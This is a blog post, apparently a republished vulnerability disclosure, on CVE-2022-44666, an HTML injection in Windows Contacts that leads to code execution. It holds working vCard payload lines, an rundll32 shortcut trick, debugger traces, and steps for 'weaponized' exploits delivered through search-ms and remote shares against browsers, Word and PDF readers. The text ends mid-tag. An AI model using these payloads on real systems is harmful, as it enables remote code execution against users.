{"id":69055,"date":"2023-07-19T14:31:28","date_gmt":"2023-07-19T06:31:28","guid":{"rendered":"https:\/\/version-2.com\/?p=69055"},"modified":"2023-08-07T15:56:21","modified_gmt":"2023-08-07T07:56:21","slug":"microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day","status":"publish","type":"post","link":"https:\/\/version-2.com\/zh\/2023\/07\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\/","title":{"rendered":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"69055\" class=\"elementor elementor-69055\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4da8c5f9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4da8c5f9\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;decf9c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-133ba185\" data-id=\"133ba185\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc2da8d post-content elementor-widget elementor-widget-text-editor\" data-id=\"fc2da8d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\" width=\"700\" height=\"394\" \/><\/p><div class=\"news-detail-inner-content\" data-v-85c4bf60=\"\" data-v-0bbc59dc=\"\"><p>This is the story about another forgotten 0day fully disclosed more than 4 years ago by <a href=\"https:\/\/twitter.com\/hyp3rlinx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">John Page (aka hyp3rlinx)<\/a>. To understand the report, you have to consider i&#8217;m stupid \ud83d\ude42 And my stupidicity drives me to take longer paths to solve simple issues, but it also leads me to figure out another ways to exploit some bugs. Why do i say this? Because i was unable to quickly understand that the way to create a .contact file is just browsing to Contact folder in order to create the contact, instead of that, i used this info to first create a VCF file and then, i wrongly thought that this was some type of variant. That was also because of my brain can&#8217;t understand some 0days are forgotten for so long time \u00af\\<em>(\u30c4)<\/em>\/\u00af Once done that and after the &#8220;wontfix&#8221; replies by <a href=\"https:\/\/twitter.com\/msftsecresponse\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">MSRC<\/a> and <a href=\"https:\/\/twitter.com\/thezdi\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">ZDI<\/a>, further investigations were made to increase the severity, finally reaching out .contact files and windows url protocol handler &#8220;ldap&#8221;.<\/p><h2>Details<\/h2><ul><li><p><strong>Vendor<\/strong>: Microsoft.<\/p><\/li><li><p><strong>App<\/strong>: Microsoft Windows Contacts.<\/p><\/li><li><p><strong>Version<\/strong>: 10.0.19044.1826.<\/p><\/li><li><p><strong>Tested systems<\/strong>: Windows 10 &amp; Windows 11.<\/p><\/li><li><p><strong>Tested system versions<\/strong>: Microsoft Windows [Version 10.0.19044.1826] &amp; Microsoft Windows [Version 10.0.22000.795]<\/p><\/li><\/ul><h2>Intro<\/h2><p>While i was reading the exploit code for <a href=\"https:\/\/www.exploit-db.com\/exploits\/46222\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">this vulnerability<\/a> which was actually released as 0day and it&#8217;s possible to find <a href=\"https:\/\/www.zerodayinitiative.com\/advisories\/ZDI-19-121\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">ZDI&#8217;s report<\/a>.<\/p><p><strong><em>Update 2022\/07\/21<\/em><\/strong><em>: After reporting this case to MS, MSRC&#8217;s folks rightly pointed me out Windows Contacts isn&#8217;t the default program to open VCF files.<\/em><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp7qvvp1l4b0uqo38mlhrxf.png\" \/><\/p><p><em>Further research still demonstrates the default program for VCF files on Win7 ESU &amp; WinServer2019 is Windows Contacts (wab.exe), otherwise MS People (PeopleApp.exe) is used. Here is a full table of this testing:<\/em><\/p><ul><li><p><em>Windows 7: Default program for VCF files is Windows Contacts (wab.exe).<\/em><\/p><\/li><li><p><em>Windows Server 2019: Default program for VCF files is Windows Contacts (wab.exe).<\/em><\/p><\/li><li><p><em>Windows 10: Default program for VCF files is MS People (PeopleApp.exe).<\/em><\/p><\/li><li><p><em>Windows 10 + MS Office: Default program for VCF files is MS Outlook (outlook.exe).<\/em><\/p><\/li><li><p><em>Windows 11: Default program for VCF files is MS People (PeopleApp.exe).<\/em><\/p><\/li><\/ul><p><em>Anyway they still argue there&#8217;s some social engineering involved such as opening a crafted VCF file and clicking on some links to exploit the bug so doesn&#8217;t meet the MSRC bug bar for a security update.<\/em><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp7rkzp1l690uo35xue7ioa.png\" \/><\/p><p><strong><em>Update 2022\/07\/25<\/em><\/strong><em>: Well, after further research, it&#8217;s the same bug. I&#8217;ve been finally able to find a .contact proof of concept. It&#8217;s actually possible to correctly parse a .contact file using HTML entities. Note this solves the previous issue (<\/em><strong><em>Update 2022\/07\/21<\/em><\/strong><em>) and this file format (.contact) is opened by Windows Contacts, default program for this file extension, even when MS Office is installed in the system. It just needs a first file association if hasn&#8217;t yet been done, but the only program installed by default to do that is Windows Contacts.<\/em><\/p><p><strong><em>Update 2022\/07\/25<\/em><\/strong><em>: This further research made me to reach a point that i was trying to reach some time ago: Use some URL protocol handler to automatically open crafted contact data to exploit the bug. I was finally able to get it working thanks to ldap uri scheme, which is associated by default to Windows Contacts application, so just setting a rogue LDAP server up and serving the payload data under mail, url or wwwhomepage attributes, the exploiting impact is increased because now it&#8217;s not needed to double click a malicious VCF\/Contact file, we can deliver this using url protocols.<\/em><\/p><p><strong><em>Update 2023\/02\/08<\/em><\/strong><em>: As a gesture of goodwill by MSRC, <\/em><a href=\"https:\/\/twitter.com\/hyp3rlinx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\"><em>John Page (aka hyp3rlinx)<\/em><\/a><em> has been included in the acknowledgement page for <\/em><a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2022-44666\" target=\"_blank\" rel=\"noopener noreferrer nofollow\"><em>CVE-2022-44666<\/em><\/a><em> discovery.<\/em><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp7rypm1l6f0uo3gi0vctsq.png\" \/><\/p><h2>Description<\/h2><p>The report basically is the same than above links, however i&#8217;ve improved a bit the social engineering involved. In fact, the first thing that i made was to improve the way the links are seen, just like it were a XSS vulnerability, it&#8217;s actually an HTML injection so it&#8217;s possible to close the first anchor element and insert a new one. Then, i wanted to remove the visibility for those HTML elements so just setting as long &#8220;innerHTML&#8221; as possible would be enough to hide them (because of there are char limits).<\/p><p>This is the final payload used:<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"notepad\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p>To watch what happens, run procmon and setup a fake target of href attribute like this:<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"foo.exe\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p>Once clicked the link, an output like this is observed in procmon:<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp96crn1luk0uo3fajn9pqr.png\" \/><\/p><p>This is the stacktrace for the first &#8220;CreateFile&#8221; operation:<\/p><pre><code>0\tFLTMGR.SYS\tFltpPerformPreCallbacksWorker + 0x36c\t0xfffff806675a666c\tC:\\WINDOWS\\System32\\drivers\\FLTMGR.SYS\n1\tFLTMGR.SYS\tFltpPassThroughInternal + 0xca\t0xfffff806675a611a\tC:\\WINDOWS\\System32\\drivers\\FLTMGR.SYS\n2\tFLTMGR.SYS\tFltpCreate + 0x310\t0xfffff806675dc0c0\tC:\\WINDOWS\\System32\\drivers\\FLTMGR.SYS\n3\tntoskrnl.exe\tIofCallDriver + 0x55\t0xfffff8066904e565\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n4\tntoskrnl.exe\tIoCallDriverWithTracing + 0x34\t0xfffff8066909c224\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n5\tntoskrnl.exe\tIopParseDevice + 0x117d\t0xfffff806694256bd\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n6\tntoskrnl.exe\tObpLookupObjectName + 0x3fe\t0xfffff8066941329e\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n7\tntoskrnl.exe\tObOpenObjectByNameEx + 0x1fa\t0xfffff806694355fa\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n8\tntoskrnl.exe\tNtQueryAttributesFile + 0x1c5\t0xfffff80669501125\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n9\tntoskrnl.exe\tKiSystemServiceCopyEnd + 0x25\t0xfffff806692097b5\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n10\tntdll.dll\tNtQueryAttributesFile + 0x14\t0x7ff8f0aed4e4\tC:\\Windows\\System32\\ntdll.dll\n11\tKernelBase.dll\tGetFileAttributesW + 0x85\t0x7ff8ee19c045\tC:\\Windows\\System32\\KernelBase.dll\n12\tshlwapi.dll\tPathFileExistsAndAttributesW + 0x5a\t0x7ff8ef20212a\tC:\\Windows\\System32\\shlwapi.dll\n13\tshlwapi.dll\tPathFileExistsDefExtAndAttributesW + 0xa1\t0x7ff8ef2022b1\tC:\\Windows\\System32\\shlwapi.dll\n14\tshlwapi.dll\tPathFileExistsDefExtW + 0x3f\t0x7ff8ef2021ef\tC:\\Windows\\System32\\shlwapi.dll\n15\tshlwapi.dll\tPathFindOnPathExW + 0x2f7\t0x7ff8ef201f77\tC:\\Windows\\System32\\shlwapi.dll\n16\tshell32.dll\tPathResolve + 0x154\t0x7ff8eebb0954\tC:\\Windows\\System32\\shell32.dll\n17\tshell32.dll\tCShellExecute::QualifyFileIfNeeded + 0x105\t0x7ff8eebb05c9\tC:\\Windows\\System32\\shell32.dll\n18\tshell32.dll\tCShellExecute::ValidateAndResolveFileIfNeeded + 0x5e\t0x7ff8eeb1e422\tC:\\Windows\\System32\\shell32.dll\n19\tshell32.dll\tCShellExecute::_DoExecute + 0x6d\t0x7ff8eeb1e1cd\tC:\\Windows\\System32\\shell32.dll\n20\tshell32.dll\t&lt;lambda_519a2c088cd7d0cdfafe5aad47e70646&gt;::&lt;lambda_invoker_cdecl&gt; + 0x2d\t0x7ff8eeb09fed\tC:\\Windows\\System32\\shell32.dll\n21\tSHCore.dll\t_WrapperThreadProc + 0xe9\t0x7ff8f098bf69\tC:\\Windows\\System32\\SHCore.dll\n22\tkernel32.dll\tBaseThreadInitThunk + 0x14\t0x7ff8f07e7034\tC:\\Windows\\System32\\kernel32.dll\n23\tntdll.dll\tRtlUserThreadStart + 0x21\t0x7ff8f0aa2651\tC:\\Windows\\System32\\ntdll.dll\n<\/code><\/pre><p>Setting a breakpoint in <strong>Shell32!ShellExecuteExW<\/strong>, we can have a clearer picture of the functions involved:<\/p><pre><code>CommandLine: \"C:\\Program Files\\Windows Mail\\wab.exe\" \/vcard C:\\Users\\admin\\Documents\\vcf-0day\\exploit.vcf\n...\nModLoad: 00007ff7`c7d50000 00007ff7`c7dd5000   wab.exe \n...\n0:000&gt; bp SHELL32!ShellExecuteExW\n...\nBreakpoint 0 hit\nSHELL32!ShellExecuteExW:\n00007ff8`eeb20e40 48895c2410      mov     qword ptr [rsp+10h],rbx ss:000000d8`dc2dae88=0000000000090622\n0:000&gt; k\n # Child-SP          RetAddr           Call Site\n00 000000d8`dc2dae78 00007ff8`d3afee27 SHELL32!ShellExecuteExW\n01 000000d8`dc2dae80 00007ff8`d3ad7802 wab32!SafeExecute+0x143\n02 000000d8`dc2dbf90 00007ff8`ef3b2920 wab32!fnSummaryProc+0x1c2\n03 000000d8`dc2dbfc0 00007ff8`ef3b20c2 USER32!UserCallDlgProcCheckWow+0x144\n04 000000d8`dc2dc0a0 00007ff8`ef3b1fd6 USER32!DefDlgProcWorker+0xd2\n05 000000d8`dc2dc160 00007ff8`ef3ae858 USER32!DefDlgProcW+0x36\n06 000000d8`dc2dc1a0 00007ff8`ef3ade1b USER32!UserCallWinProcCheckWow+0x2f8\n07 000000d8`dc2dc330 00007ff8`ef3ad68a USER32!SendMessageWorker+0x70b\n08 000000d8`dc2dc3d0 00007ff8`d93a6579 USER32!SendMessageW+0xda\n09 000000d8`dc2dc420 00007ff8`d93a62e7 comctl32!CLink::SendNotify+0x12d\n0a 000000d8`dc2dd560 00007ff8`d9384bb8 comctl32!CLink::Notify+0x77\n0b 000000d8`dc2dd590 00007ff8`d935add2 comctl32!CMarkup::OnButtonUp+0x78\n0c 000000d8`dc2dd5e0 00007ff8`ef3ae858 comctl32!CLink::WndProc+0x86ff2\n0d 000000d8`dc2dd6f0 00007ff8`ef3ae299 USER32!UserCallWinProcCheckWow+0x2f8\n0e 000000d8`dc2dd880 00007ff8`ef3ac050 USER32!DispatchMessageWorker+0x249\n0f 000000d8`dc2dd900 00007ff8`d92b6317 USER32!IsDialogMessageW+0x280\n10 000000d8`dc2dd990 00007ff8`d92b61b3 comctl32!Prop_IsDialogMessage+0x4b\n11 000000d8`dc2dd9d0 00007ff8`d92b5e2d comctl32!_RealPropertySheet+0x2bb\n12 000000d8`dc2ddaa0 00007ff8`d3acfb68 comctl32!_PropertySheet+0x49\n13 000000d8`dc2ddad0 00007ff8`d3ace871 wab32!CreateDetailsPropertySheet+0x930\n14 000000d8`dc2de140 00007ff8`d3ad68f5 wab32!HrShowOneOffDetails+0x4f5\n15 000000d8`dc2de390 00007ff8`d3af800f wab32!HrShowOneOffDetailsOnVCard+0xed\n16 000000d8`dc2de400 00007ff7`c7d51b16 wab32!WABObjectInternal::VCardDisplay+0xbf\n17 000000d8`dc2de450 00007ff7`c7d52c28 wab!WinMain+0x896\n18 000000d8`dc2dfab0 00007ff8`f07e7034 wab!__mainCRTStartup+0x1a0\n19 000000d8`dc2dfb70 00007ff8`f0aa2651 KERNEL32!BaseThreadInitThunk+0x14\n1a 000000d8`dc2dfba0 00000000`00000000 ntdll!RtlUserThreadStart+0x21\n<\/code><\/pre><p>And the involved pseudo-code is the next:<\/p><pre><code>_int64 __fastcall fnSummaryProc(HWND hWnd, int a2, WPARAM a3, LONG_PTR a4)\n{\n\n...\n\n      default:\n        if ( !((v22 + 4) &amp; 0xFFFFFFFD) &amp;&amp; *(_WORD *)(v5 + 136) )\n          SafeExecute(v7, (const unsigned __int16 *)v9, (const unsigned __int16 *)(v5 + 136)); &lt;== FOLLOW THIS PATH\n        break;\n    }\n  }\n  return 1i64;\n}\n\n\n__int64 __fastcall SafeExecute(HWND a1, const unsigned __int16 *a2, const unsigned __int16 *a3)\n{\n  const unsigned __int16 *v3; \/\/ rbx\n  HWND v4; \/\/ rdi\n  unsigned int v5; \/\/ ebx\n  BOOL v6; \/\/ ebx\n  __int64 v7; \/\/ rdx\n  OLECHAR *v8; \/\/ rax\n  signed int v10; \/\/ eax\n  DWORD pcchCanonicalized; \/\/ [rsp+20h] [rbp-E0h]\n  SHELLEXECUTEINFOW pExecInfo; \/\/ [rsp+30h] [rbp-D0h]\n  OLECHAR Dst[2088]; \/\/ [rsp+A0h] [rbp-60h]\n\n  v3 = a3;\n  v4 = a1;\n  memset_0(Dst, 0, 0x1048ui64);\n  pcchCanonicalized = 2084;\n  v5 = UrlCanonicalizeW(v3, Dst, &amp;pcchCanonicalized, 0);\n  if ( (v5 &amp; 0x80000000) == 0 )\n  {\n    v6 = UrlIsW(Dst, URLIS_FILEURL);\n  pExecInfo.hProcess = 0i64;\n      pExecInfo.hwnd = 0i64;\n      pExecInfo.lpVerb = 0i64;\n      _mm_store_si128((__m128i *)&amp;pExecInfo.lpParameters, (__m128i)0i64);\n      *(_OWORD *)&amp;pExecInfo.hInstApp = 0i64;\n      *(_OWORD *)&amp;pExecInfo.lpClass = 0i64;\n      *(_OWORD *)&amp;pExecInfo.dwHotKey = 0i64;\n      if ( !ShellExecuteExW(&amp;pExecInfo) ) &lt;== CALL HERE\n      {\n        v10 = GetLastError();\n        v5 = (unsigned __int16)v10 | 0x80070000;\n        if ( v10 &lt;= 0 )\n          v5 = v10;\n      }\n  }\n  ...\n}<\/code><\/pre><p>After this, it&#8217;s clear the issue actually involves <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/controls\/syslink-overview\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">SysLink controls in comctl32.dll library<\/a> and how the href attribute is parsed by wab32.dll library.<\/p><p>It isn&#8217;t possible to use remote shared locations or webdavs to exploit this.<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"\\\\127.0.0.1@80\\test\\payload.exe\"&gt;CLICKMEEEEE...&lt;\/a&gt;\nURL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"\\\\vboxsvr\\test\\payload.exe\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p>The file info is queried but is never executed.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp981wd1lsa0uqo12dl6vv0.png\" \/><\/p><p>It&#8217;s possible to use relative paths such as:<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"foo\\foo.exe\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp98ea01lvp0uo3ckivgovp.png\" \/><\/p><p>Example:<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"hidden\\payload.exe\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp98koh1lvv0uo30ds11jc7.png\" \/><\/p><p>Just going further and while testing rundll32 as attack vector, just noticed it was not possible to use arguments with the payload executable selected. However using a lnk file which targets a chosen executable, it was possible to use cmdline arguments. It&#8217;s a bit tricky but it works.<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"hidden\\run.lnk\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p>Target of run.lnk:<\/p><pre><code>rundll32.exe hidden\\payload.bin,Foo\"\n<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp992ss1lsq0uqo31ibcw43.png\" \/><\/p><p>This looks more interesting because it&#8217;s not needed to drop an executable in the target system.<\/p><h2>Impact<\/h2><p>Remote Code Execution as the current user logged.<\/p><h2>Proofs of Concept<\/h2><p>It has to exist file association to use Windows Contacts to open .vcf files.<\/p><p><strong><em>Update 2021\/07\/25<\/em><\/strong><em>: For Contact files (.contact) there is only one application to open them by default: Windows Contacts, even when MS Office is installed in the target system.<\/em><\/p><p>Using files located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/<\/a>:<\/p><ol><li><p>Double-click the file <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/exploit.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">exploit.vcf<\/a> (<strong><em>Update 2021\/07\/25<\/em><\/strong>: Or double-click the file <a href=\"http:\/\/exploit.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">exploit.contact<\/a>).<\/p><\/li><li><p>Do single click in one of &#8220;click-me&#8221; links.<\/p><\/li><li><p>It launches notepad.exe using different ways to execution:<\/p><ul><li><p>3.1. Link 1: Run .lnk file that triggers rundll32 with a crafted library.<\/p><\/li><li><p>3.2. Link 2: This triggers the execution of an executable located in folder &#8220;hidden&#8221; as a local path.<\/p><\/li><li><p>3.3. Link 3: Directly.<\/p><\/li><\/ul><\/li><\/ol><p>There are a couple of videos attached in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos<\/a>:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/simple-payload.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/simple-payload.gif<\/a>: This is an example to download a single vcf file and triggers the bug.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp99j7l1lsx0uqoee8v3ebs.gif\" \/><\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/full-payload.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/full-payload.gif<\/a>: This is a more complex example which downloads a zip file that allows to trigger all the payloads.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp99ytz1lt30uqoe35z5qh2.gif\" \/><\/p><p>This is a summary of the proof of concept files located in .\/report-pocs\/:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/exploit.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/exploit.vcf<\/a>: Proof of concept to double-click it.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/exploit.zip\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/exploit.zip<\/a>: Zipped file to be downloaded which includes all the tricks to exploit the bug (video: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/full-payload.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">full-payload.gif<\/a>)<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/hidden\/payload.lnk\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/hidden\/payload.lnk<\/a>: LNK file to run the payload with cmdline arguments.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/hidden\/payload.bin\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/hidden\/payload.bin<\/a>: DLL payload. It finally runs notepad.exe<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/hidden\/payload.exe\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/hidden\/payload.exe<\/a>: Executable payload. It finally runs notepad.exe<\/p><\/li><\/ul><p>And files located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/src\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/src<\/a>:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/src\/dllmain.cpp\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">dllmain.cpp<\/a>: DLL library used as payload (payload.bin).<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/src\/payload.cpp\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">payload.cpp<\/a>: Executable used as payload (payload.exe).<\/p><\/li><\/ul><h2>Further exploitation<\/h2><p>For further exploitation and as the vulnerability doesn&#8217;t allow to load remote shared location files, uri protocol &#8220;search-ms&#8221; is an interesting vector. You&#8217;ll find proofs of concept which only trigger a local binary like calc or notepad and more complex proofs of concept that i&#8217;ve named as weaponized exploit, because of they don&#8217;t execute local files. These pocs &amp; exploits are located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/<\/a>.<\/p><p>This is a summary of target applications:<\/p><ul><li><p>Browsers: MS Edge, Google Chrome, Mozilla Firefox &amp; Opera. Note uri protocol &#8220;search-ms&#8221; is <a href=\"https:\/\/www.mozilla.org\/en-US\/security\/advisories\/mfsa2022-24\/#CVE-2022-34478\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">disabled for Mozilla Firefox at the time of writing this write-up<\/a>.<\/p><\/li><li><p>MS Word.<\/p><\/li><li><p>PDF Readers (mainly Adobe Acrobat Reader DC &amp; Foxit PDF Reader).<\/p><\/li><\/ul><p>In order to reproduce:<\/p><ol><li><p>Setup a remote shared location (SMB or WebDav). Copy content of <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/to-copy-in-remote-shared-location\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/to-copy-in-remote-shared-location\/<\/a> into it.<\/p><\/li><li><p>If wanted, hide the files running <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/to-copy-in-remote-shared-location\/setup-hidden.bat\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/to-copy-in-remote-shared-location\/setup-hidden.bat<\/a>.<\/p><\/li><li><p>Modify file exploit.html\/poc.html located in .\/further-pocs\/[vector or target app]\/remote-weaponized-by-searchms\/ to point to your remote shared location.<\/p><\/li><li><p>Start a webserver in the target app path, that is: .\/further-pocs\/[vector or target app]\/[poc||remote-weaponized-by-searchms]\/.<\/p><\/li><li><p>Run poc\/exploit files depending on the case.<\/p><\/li><li><p>For further info, watch the videos located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos<\/a>:<\/p><ul><li><p>6.1. PoC for browsers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/browsers-poc.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/browsers-poc.gif<\/a><\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/raw\/main\/videos\/browsers-poc.gif\" \/><\/p><ul><li><p>6.2. Exploit for browsers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/browsers-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/browsers-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9d6lm1lxw0uo3eq9abzrt.gif\" \/><\/p><ul><li><p>6.3. PoC for MS Word: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/msword-poc.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/msword-poc.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9gi4z1lz50uo3ghj3bsz5.gif\" \/><\/p><ul><li><p>6.4. Exploit for MS Word: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/msword-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/msword-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" 